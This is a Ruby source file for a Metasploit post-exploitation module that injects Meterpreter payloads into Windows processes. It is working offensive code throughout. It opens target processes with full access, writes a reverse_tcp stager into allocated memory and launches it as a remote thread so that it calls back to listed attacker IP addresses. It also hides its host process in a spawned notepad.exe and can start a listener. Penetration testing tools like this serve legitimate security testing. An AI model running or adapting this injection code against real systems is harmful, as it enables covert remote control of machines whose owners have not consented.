##
# $Id$
##
##
# ## This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'rex'
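class Metasploit3 < Msf::Post

  # Registers the module metadata and its basic/advanced options.
  #
  # @param info [Hash] module info hash merged through +update_info+
  def initialize(info = {})
    super(update_info(info,
      'Name'         => 'Windows Manage Inject in Memory Multiple Payloads',
      'Description'  => %q{ This module will inject in to several process a given
        payload and connecting to a given list of IP Addresses.
        The module works with a given lists of IP Addresses and
        process PIDs if no PID is given it will start a the given
        process in the advanced options and inject the selected
        payload in to the memory of the created module.},
      'License'      => MSF_LICENSE,
      'Author'       => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>'],
      'Version'      => '$Revision$',
      'Platform'     => [ 'windows' ],
      'SessionTypes' => [ 'meterpreter']
    ))

    register_options(
      [
        OptString.new('PAYLOAD', [false, 'Payload to inject in to process memory', "windows/meterpreter/reverse_tcp"]),
        OptInt.new('LPORT', [false, 'Port number for the payload LPORT variable.', 4444]),
        OptString.new('IPLIST', [true, 'List of semicolom separated IP list.', Rex::Socket.source_address("1.2.3.4")]),
        OptString.new('PIDLIST', [false, 'List of semicolom separated PID list.', '']),
        OptBool.new('HANDLER', [false, 'Start new multi/handler job on local box.', false])
      ], self.class)

    register_advanced_options(
      [
        # The original description was the placeholder text 'Description'
        OptString.new('PROCESSNAME', [false, 'Process to start when no PID is given for an address', 'notepad.exe'])
      ], self.class)
  end

  # Run method for when the run command is issued.
  #
  # Each entry of IPLIST is paired by position with the entry of PIDLIST at
  # the same index.  Where no PID exists for an address (PIDLIST shorter than
  # IPLIST, or a blank entry such as the middle of "12;;34") a PROCESSNAME
  # process is started and used as the host instead.
  def run
    unless client.platform =~ /win/
      print_error("This module requires native Windows meterpreter functions not compatible with the selected session")
      return
    end

    print_status("Running module against #{sysinfo['Computer']}")

    create_multi_handler(datastore['PAYLOAD'], datastore['LPORT']) if datastore['HANDLER']

    ip_list  = split_list(datastore['IPLIST']).compact
    pid_list = split_list(datastore['PIDLIST'])

    ip_list.zip(pid_list).each do |lhost, target_pid|
      payload = create_payload(datastore['PAYLOAD'], lhost, datastore['LPORT'])
      # if no PID we create a process to host the Meterpreter session
      target_pid ||= start_proc(datastore['PROCESSNAME'])
      inject(target_pid, payload)
      # select with only a timeout is used as a 5 second pause between injections
      select(nil, nil, nil, 5)
    end
  end

  # Function for injecting payload in to a given PID
  #-------------------------------------------------------------------------------
  #
  # @param target_pid [String, Integer] PID to open; coerced with +to_i+
  # @param payload_to_inject [Msf::Payload] payload whose +generate+ output is written
  # @return [nil]
  def inject(target_pid, payload_to_inject)
    print_status("Injecting meterpreter into process ID #{target_pid}")
    host_process = session.sys.process.open(target_pid.to_i, PROCESS_ALL_ACCESS)
    raw = payload_to_inject.generate
    mem = host_process.memory.allocate(raw.length + (raw.length % 1024))
    print_status("Allocated memory at address #{"0x%.8x" % mem}, for #{raw.length} byte stager")
    print_status("Writing the stager into memory...")
    host_process.memory.write(mem, raw)
    host_process.thread.create(mem, 0)
    print_good("Successfully injected Meterpreter in to process: #{target_pid}")
  rescue ::StandardError, ::Rex::TimeoutError => e
    # StandardError instead of ::Exception so Interrupt/SystemExit still propagate;
    # Rex::TimeoutError is named explicitly because it does not descend from StandardError
    print_error("Failed to Inject Payload to #{target_pid}!")
    print_error("#{e.class}: #{e.message}")
  end

  # Function for Creation of Connection Handler
  #-------------------------------------------------------------------------------
  #
  # Starts a multi/handler as a background job in the local framework.
  #
  # @param payload_to_inject [String] payload reference name
  # @param rport [Integer] LPORT for the handler
  # @param rhost [String] LHOST for the handler, all interfaces by default
  def create_multi_handler(payload_to_inject, rport, rhost = '0.0.0.0')
    print_status("Starting connection handler at port #{rport} for #{payload_to_inject}")
    mul = client.framework.exploits.create("multi/handler")
    mul.datastore['WORKSPACE']     = session.workspace
    mul.datastore['PAYLOAD']       = payload_to_inject
    mul.datastore['LHOST']         = rhost
    mul.datastore['LPORT']         = rport
    mul.datastore['EXITFUNC']      = 'process'
    mul.datastore['ExitOnSession'] = false
    mul.exploit_simple(
      'Payload'  => mul.datastore['PAYLOAD'],
      'RunAsJob' => true
    )
    print_good("Multi/Handler started!")
  end

  # Function for Creating the Payload
  #-------------------------------------------------------------------------------
  #
  # @param payload_type [String] payload reference name
  # @param lhost [String] value for the payload LHOST option
  # @param lport [Integer] value for the payload LPORT option
  # @return [Msf::Payload] configured payload instance (not yet generated)
  def create_payload(payload_type, lhost, lport)
    print_status("Creating a reverse meterpreter stager: LHOST=#{lhost} LPORT=#{lport}")
    pay = client.framework.payloads.create(payload_type)
    pay.datastore['LHOST'] = lhost
    pay.datastore['LPORT'] = lport
    pay
  end

  # Function starting the host process
  #-------------------------------------------------------------------------------
  #
  # @param proc_name [String] executable name passed to the session's process.execute
  # @return [Integer] PID of the created process
  def start_proc(proc_name)
    # The message used to say Notepad.exe regardless of PROCESSNAME
    print_good("Starting #{proc_name} to house Meterpreter Session.")
    proc = client.sys.process.execute(proc_name, nil, { 'Hidden' => true })
    print_good("Process created with pid #{proc.pid}")
    proc.pid
  end

  private

  # Splits a semicolon separated option value into positional entries.
  #
  # Blank entries become +nil+ rather than being dropped, so a blank PID keeps
  # its alignment with the address at the same index (the old code passed the
  # empty string on, which became PID 0 via +to_i+).
  #
  # @param value [String, nil] raw option value
  # @return [Array<String, nil>] stripped entries, blanks as nil
  def split_list(value)
    value.to_s.split(';').map do |entry|
      stripped = entry.strip
      stripped.empty? ? nil : stripped
    end
  end
end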